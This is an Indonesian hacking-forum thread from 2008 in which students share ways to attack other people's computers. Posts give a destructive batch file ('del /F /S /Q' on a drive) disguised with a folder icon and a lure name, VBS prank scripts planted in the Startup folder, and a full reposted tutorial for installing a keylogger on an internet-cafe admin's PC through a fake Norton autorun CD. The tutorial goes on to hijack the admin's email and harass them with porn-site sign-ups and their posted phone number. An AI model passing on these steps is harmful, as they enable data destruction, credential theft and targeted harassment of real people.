[SHARE] gara2 chat ma falih

Halaman 1 dari 2 1, 2  Next

Topik sebelumnya Topik selanjutnya Go down

[SHARE] gara2 chat ma falih

Post by ichean_coy on Tue Dec 23, 2008 10:59 pm

wwkw,...
gara chat ma si falih...
inget deh dlo pernah iseng ma komp temen N lab...
ni serada inget juga si...

ntar klo gw inget lagi bakal gw update....

maen di note pad
buka note pad looo
trus ketik
Code:
hehe=msgbox("Warning, Your Computer Have Broken By Ichean_coy",20,"Virus Alert")
abiz itu lo simpen dalam 4mat
Virus.vbs

klo mo efective simpen di drive C
klo mo efective banget simpen di C:\Documents and Settings\All Users\Start Menu\Programs\Startup

muantab dagh hasil nya


heheheh
nti klo dagh inget lagi gw update dagh,..

oh iya suruh falih juga,..
dia juga tau tuh...

ayo lih share ilmu2 jahat yg dlo

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by falih_akz on Tue Dec 23, 2008 11:12 pm

hussss...........!!!!!!!!!!


pake bongkar2 gudang sgala niee...

lol!
lol!
lol!
lol!
lol!

iya ntar gw inget2 dolo...

falih_akz
Member
Member

Jumlah posting : 222
Age : 25
Location : di koordinat (45,107)
Job/hobbies : idup seneng
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by destian_46 on Tue Dec 23, 2008 11:13 pm

Udah Umes....
Pernah Nyoba Gw Can...
Di Kompi Si bantet....
Dia Panik Setengah Mati....
Wakakakak...

destian_46
Moderator
Moderator

Jumlah posting : 237
Age : 25
Location : Depan Komputer
Job/hobbies : Hacking n Programming
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user http://destiangerrard.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by falih_akz on Tue Dec 23, 2008 11:17 pm

seneng yach klo ngerjain orang tuch... ga tau knapa... giggle


mungkin emg udah naluri qta sebagai seorang cracker..
lol! lol! lol!

ogah ah..,ngerugiin org laen ajah..

falih_akz
Member
Member

Jumlah posting : 222
Age : 25
Location : di koordinat (45,107)
Job/hobbies : idup seneng
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Tue Dec 23, 2008 11:36 pm

wietssssss...

2 be hacker not cracker

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by DANDY on Wed Dec 24, 2008 12:25 am

cracker itu apa yah?? biskuit cracker??

_________________

DANDY
Admin
Admin

Jumlah posting : 403
Age : 25
Location : EveryWhere
Job/hobbies : Student/Playing Game
points :
100 / 100100 / 100

Registration date : 16.12.08

Lihat profil user http://kadut.forumotion.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by falih_akz on Thu Dec 25, 2008 10:50 am

paling yg gw inget mah yg simple2 doank...,eiitsss tapi ttp mematikan..!
biasa, msDOS.. Cool



buat file txt baru....

pastiin, kira2 klo U colokin FD ke kompi korban, kira2 drive letternya apa.. misal, E:\

cd /d E:

del /F /S /Q

save..

ubah extension-nya jadi *.bat

simpen di mana ajah..

buat shortcut di desktop

ubah iconnya jd icon folder

kasih nama yg menarik.. misal: Bokep SMA


hasilnya silakan dicoba sendiri

falih_akz
Member
Member

Jumlah posting : 222
Age : 25
Location : di koordinat (45,107)
Job/hobbies : idup seneng
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Thu Dec 25, 2008 11:39 pm

falih_akz wrote:paling yg gw inget mah yg simple2 doank...,eiitsss tapi ttp mematikan..!
biasa, msDOS.. Cool



buat file txt baru....

pastiin, kira2 klo U colokin FD ke kompi korban, kira2 drive letternya apa.. misal, E:\

cd /d E:

del /F /S /Q

save..

ubah extension-nya jadi *.bat

simpen di mana ajah..

buat shortcut di desktop

ubah iconnya jd icon folder

kasih nama yg menarik.. misal: Bokep SMA


hasilnya silakan dicoba sendiri



lol! lol! lol! lol!
paragh banget ni nak SCC...
ntu mah kerjaan te2h gw klo maen ke warnet...
termsuk gw juga...
dagh banyak tuh warnet jadi victim....

tapi warnet lo belon ni lih,..


ISENG MODE : ON
STATUS : JOKE
TARGET : AZU NET

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by falih_akz on Fri Dec 26, 2008 8:32 am

yooo mariii....

kompi-nya udh di freeze smua koq, silakan aja berkreasi..



btw te2h U ntu kul.dimana yah..,gw lupa.? yg waktu ntu dateng ke Smansa ama loe itu bukan? waktu acara pembukaan SCC..?? yg gw ngoceh2 gak jelas di dpn klz XI di whiteboard ntuu..??

falih_akz
Member
Member

Jumlah posting : 222
Age : 25
Location : di koordinat (45,107)
Job/hobbies : idup seneng
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Fri Dec 26, 2008 9:23 pm

kwkwkwk,...
sialan,...
boleh tuh jadi tempat belajar nge bobol deep freze.

ayo all
dateng ke ke warnet falih,..
acak2..


te2h gw..
kul di GUNDAR...
iye pas pembukaan SCC dateng..
iye pas lo ngoceh ngomongin pa moh..
gk jelas...

hheheh..
piece

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by falih_akz on Sat Dec 27, 2008 6:07 pm

owya gw baru inget..., ya itu lagi ngomongin masalah pemrograman kayak gitu. secara gw ketua divisi getoohh.. metal metal

falih_akz
Member
Member

Jumlah posting : 222
Age : 25
Location : di koordinat (45,107)
Job/hobbies : idup seneng
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Sat Dec 27, 2008 8:54 pm

kwkw,...


ampoen ktua SCC...
o ya nak SCC ikut olimp tidak,..
nak2 buah gw ngikut,...
urbburbuwubrwubrbuw,......

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by falih_akz on Sun Dec 28, 2008 8:47 pm

liburan....,gak ada waktu bwt promosi...

ntar klo udh taon depan...

falih_akz
Member
Member

Jumlah posting : 222
Age : 25
Location : di koordinat (45,107)
Job/hobbies : idup seneng
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Sun Dec 28, 2008 9:40 pm

waduh...

lo dagh pensi dung....

paleng lih soal na,..
pa gw yg lier ya..
wkkwkw,....

oh iya KETOS na masih ikut SCC.....?





oh iya lanjutttt,....

ni skrg gw share ngerjai kompi orang dengan SCRIPT VB...
mungkin dagh basi kaliii yah,..
tapi bodo ah,..
Code:

Tools yang di butuhkan :
- Komputer
- notepad
- snack
- drink
- dan silat lidah euhehue
oke lanjut
1. lo buka notepad
2. tulis script VB
Ketik visual basic script di bawah ini.

[code]Dim tanya, jawab
tanya = Msgbox("wooi bayar utang lo ke gw...??",vbYesNo)
Do
  if tanya = vbYes then
      jawab = OK
      Msgbox("pinter....gitu dong")
      'Exit Do atau Wscript.Quit
  else
      jawab = Ngocol
      MsgBox("eh clongok lo,....bandel amet sih")
  end if
Loop While jawab = Ngocol Or jawab = OK[/code]

NB : tuh bisa lo otak atik lagi,.....

3. simpen dengan 4mat VB ( ex utang.vbs )
4. Masuk ke explorer dan arahkan direktori ke [color=red]C:Documents and Settings\All Users\Start Menu\Programs\Startup[/color]. Lantas, copy kan file System.vbs tadi ke direktori tersebut.


sebenernya da cara lain lagi biar ntu bisa run,..
dari regedit klo gk salah,...
tapi tanya nak SCC ja,.. :P
cz ni awal pertemuan di SCC blajar ni klo gk salah,..
kwwkwkw :giggle:

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Next khusus di warnet ( trutama warnet falih ) kwkwkw...hasil repost

Post by ichean_coy on Sun Dec 28, 2008 9:56 pm

lanjutttt...
pelajaran lum slese....

sperti kata gw "2 be hacker not cracker"

peralatan yang di butuhkan :
1. warnet
2. komp
3. notepad
4. wajah tanpa dosa:l14r:
5. CD kosong
6. duit wat byr biling
7. seperti biasa Snack dan Drink lol! lol! lol!

oke karena ni hasil REPOST
trus gw lagi males ngetik ( maklum OL dari HP )
langsung GW COPAS ja yakkk,..
ehuehuehehu



Code:
1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak
pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman.
Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan
bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang
untuk mencari-cari cara menerobos segala keterbatasan itu dan saling
men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah,
didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri
sampai tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan
lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room
drive dihapus dan melarang user untuk melakukan segala bentuk transfer
file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali
melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir
ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai
rajin mengupdate path sehingga exploit-exploit yang dulu
dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk
menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak
ada system yang 100% secure.

2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah
ini biar ente merasa agak sedikit keren) yang akan merekam segala
aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal
yang banyak diinginkan orang.. mendapatkan password sang admin. Partner
kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton
AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di
halaman member kategori Keyloger. Setelah kamu download keyloger
tersebut, ikuti langkah-langkah berikut:

—[1 Bukalah Notepad kemudian ketik satu baris script berikut:
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan
pada form isian name beri nama Autorun.inf lalu klik tombol [save].

—[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive…
echo Please wait…
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan
pada form isian name beri nama nav.bat lalu klik tombol [save].

—[3. Persiapkan beberapa file microsoft word documents (bisa diganti
dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin
banyak file, semakin baik karena file keyloger kamu akan semakin
tersamarkan.

—[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua
file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan)
kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah
seperti biasa dan jangan gugup selayaknya para koruptor yang sering
nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke
billing komputer user, datangi sang admin. Katakan pada beliau,
"Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya
blablabla tolong dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis —> file
autorun.inf akan memproses file nav.bat —> file nav.bat akan
menduplikasi file navw32.exe ke dalam directory windows dan
mengaktivkannya —> Keyloger telah terinstall, hasil rekamannya
akan tersimpan di directory yang sama dengan nama navw32.dll beratribut
hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin
(lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus
jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory
windows sang admin? Ikuti langkah-langkah pada serangan kedua.

3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah
secara wajar dan beraktivitas seperti layaknya user biasa. Setelah
selesai berinternet ria, datangi sang admin, bayarlah biaya browsing
seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis
di jalanan :) katakan pada beliau,"Mas/mbak/om/tante/, komputer saya
bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang
berada di directory windows hilang. File tersebut beratribut hidden.
Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama
dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu
kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan
opsi Show All files pada Folder Options dan mengcopy-kan file
navw32.dll dari directory windows tanpa menyadari bahwa file tersebut
bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan,
ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut
di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with,
klik opsi select program from a list dan pilih notepad pada daftar
program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang
admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum’at kliwon dimana sang admin
mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah
ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar
lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang
admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai
mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno
dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut
contohnya jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau jika berbahasa Inggris:

Dear,
Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!! :)
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor
manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh
telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah
bisa ditebak apa maksudnya :)
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang
admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan
email-email dari berbagai milis yang beliau sendiri tidak merasa pernah
bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang
sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih
terus-terusan menjerit-jerit dengan jeritan indah :)

5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas,
maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol
shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk,
tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu
bisa melepas tombol shift dan mengaksesnya melalui windows Explorer.
Klik pada area folder tree sebelah kiri, jangan pada daftar drive
sebelah kanan karena fitur autorun akan aktif.

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by juvaqh on Sun Dec 28, 2008 10:25 pm

ho ho ho .. . . ..

om ichan juga dah ikut test persiapan yo....

soalna ngehe ya....

paleng ya....

juvaqh
New Member
New Member

Jumlah posting : 31
Age : 25
Location : C-Rank
Job/hobbies : Pejoeank '45
points :
0 / 1000 / 100

Registration date : 19.12.08

Lihat profil user http://juvaqh.wordpress.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Sun Dec 28, 2008 10:50 pm

jah gw gk ikutan kale,....
cuma liat soal yg dikirim si udel....

lier uey,..
lo isa gk ndu,....
babe lo bisa tidak,...

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by juvaqh on Sun Dec 28, 2008 11:17 pm

yang analitik pa yang programmer ???

bisa .. . . .bisa mabok gwa pale

awal gwa login.....

1. anjrit gwa lupa passwordnya scratch

2. akhirnya chat ama adminnya Razz

3. setelah 10 menit gw dikachangin akhirnya dibalez juga Laughing

4. gwa ngeluh ama dia cuz gak ada fasilitas lupa password Twisted Evil

5. ujung - ujungnya ID gwa dia obrak abrik nyariin password gwa Evil or Very Mad

6. password dapet dan gwa login ke situsnya cheers

7. waktu tersisa tinggal 40 menit lagi sedangkan gwa belum maen jawab sedikitpun affraid

8. gwa buka soal pertama, ceritanya tentang pak toni yang punya ayam dari 1<=N<=1000 dia punya ayam top ( ayam kampus kalee ) yang dilambangin ama bilangan prima. Pertanyaannya buat model ayam top pak toni..... scratch

9. gwa sempet mikir, ngapain juga nih orang ngetop ngetopin ayam kurang kerjaan amat rabbit

10. akhirnya gwa itung dengan perhitungan gwa sendiri, tapi otak gw overload pinokio

11. gwa stress berat dan cuma bisa ngomong ' nih ayam nyusahin orang aja, ngapain juga mikirin ayam dia aja belum tentu mikirin gwa' scratch

12. akhirnya window ypc gw shut dan ganti dengan megaman zero 4 flower


lol! lol! lol! lol!

juvaqh
New Member
New Member

Jumlah posting : 31
Age : 25
Location : C-Rank
Job/hobbies : Pejoeank '45
points :
0 / 1000 / 100

Registration date : 19.12.08

Lihat profil user http://juvaqh.wordpress.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Sun Dec 28, 2008 11:41 pm

juvaqh wrote:yang analitik pa yang programmer ???

bisa .. . . .bisa mabok gwa pale

awal gwa login.....

1. anjrit gwa lupa passwordnya scratch

2. akhirnya chat ama adminnya Razz

3. setelah 10 menit gw dikachangin akhirnya dibalez juga Laughing

4. gwa ngeluh ama dia cuz gak ada fasilitas lupa password Twisted Evil

5. ujung - ujungnya ID gwa dia obrak abrik nyariin password gwa Evil or Very Mad

6. password dapet dan gwa login ke situsnya cheers

7. waktu tersisa tinggal 40 menit lagi sedangkan gwa belum maen jawab sedikitpun affraid

8. gwa buka soal pertama, ceritanya tentang pak toni yang punya ayam dari 1<=N<=1000 dia punya ayam top ( ayam kampus kalee ) yang dilambangin ama bilangan prima. Pertanyaannya buat model ayam top pak toni..... scratch

9. gwa sempet mikir, ngapain juga nih orang ngetop ngetopin ayam kurang kerjaan amat rabbit

10. akhirnya gwa itung dengan perhitungan gwa sendiri, tapi otak gw overload pinokio

11. gwa stress berat dan cuma bisa ngomong ' nih ayam nyusahin orang aja, ngapain juga mikirin ayam dia aja belum tentu mikirin gwa' scratch

12. akhirnya window ypc gw shut dan ganti dengan megaman zero 4 flower


lol! lol! lol! lol!



kkwkw,....

gw ngerjai soal yg ni ni
Soal programming .
OSN 2007 Sesi 2 Nomor 8 (21 Dec 2008)

Code:
DESKRIPSI SOAL .
Buatlah sebuah program untuk mengubah suatu pecahan menjadi bentuk pecahan campuran-tersederhana . Sebagai contoh, 10/4 akan diubah menjadi 2 1/2, 6/9 menjadi 2/3 .

DESKRIPSI MASUKAN
lihat deskripsi

DESKRIPSI KELUARAN
lihat deskripsi

CONTOH SOAL
contoh masukan :
10/4
contoh keluaran :
2 1/2
contoh masukan :
6/9
contoh keluaran :
2/3


aneh ,.... lol! lol! lol! lol! lol! lol!

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by DANDY on Mon Dec 29, 2008 3:35 am

soal paan sih?? websitenya apaan dun?

mana sini soalnya coba gw kerjain

_________________

DANDY
Admin
Admin

Jumlah posting : 403
Age : 25
Location : EveryWhere
Job/hobbies : Student/Playing Game
points :
100 / 100100 / 100

Registration date : 16.12.08

Lihat profil user http://kadut.forumotion.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by juvaqh on Mon Dec 29, 2008 9:52 am

YPC 2008 bro....

www.ypc2008.co.cc

soalna cantik - cantik

juvaqh
New Member
New Member

Jumlah posting : 31
Age : 25
Location : C-Rank
Job/hobbies : Pejoeank '45
points :
0 / 1000 / 100

Registration date : 19.12.08

Lihat profil user http://juvaqh.wordpress.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by DANDY on Mon Dec 29, 2008 2:18 pm

ga bisa daftar....

_________________

DANDY
Admin
Admin

Jumlah posting : 403
Age : 25
Location : EveryWhere
Job/hobbies : Student/Playing Game
points :
100 / 100100 / 100

Registration date : 16.12.08

Lihat profil user http://kadut.forumotion.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by ichean_coy on Mon Dec 29, 2008 9:28 pm

jah mana ngarti si dandi mah,....

tau yak game duaaaaaaaaaaaaaaaaaaang Twisted Evil

ichean_coy
Moderator
Moderator

Jumlah posting : 437
Age : 24
Location : serang
Job/hobbies : ngotak2 ngatik2 kompi
points :
50 / 10050 / 100

Registration date : 16.12.08

Lihat profil user http://www.ichean.blogspot.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by falih_akz on Mon Dec 29, 2008 9:58 pm

keren nich,...



sayang situsnya dikunci...

falih_akz
Member
Member

Jumlah posting : 222
Age : 25
Location : di koordinat (45,107)
Job/hobbies : idup seneng
points :
0 / 1000 / 100

Registration date : 18.12.08

Lihat profil user

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by DANDY on Mon Dec 29, 2008 10:50 pm

ichean_coy wrote:jah mana ngarti si dandi mah,....

tau yak game duaaaaaaaaaaaaaaaaaaang Twisted Evil

buktikan aja, alien

gampang cuma :

jika IF maka THEN, yang lainya ELSE. jadi??

cuma pake logika doang Twisted Evil

_________________

DANDY
Admin
Admin

Jumlah posting : 403
Age : 25
Location : EveryWhere
Job/hobbies : Student/Playing Game
points :
100 / 100100 / 100

Registration date : 16.12.08

Lihat profil user http://kadut.forumotion.com

Kembali Ke Atas Go down

Re: [SHARE] gara2 chat ma falih

Post by Sponsored content Today at 1:52 pm


Sponsored content


Kembali Ke Atas Go down

Halaman 1 dari 2 1, 2  Next

Topik sebelumnya Topik selanjutnya Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik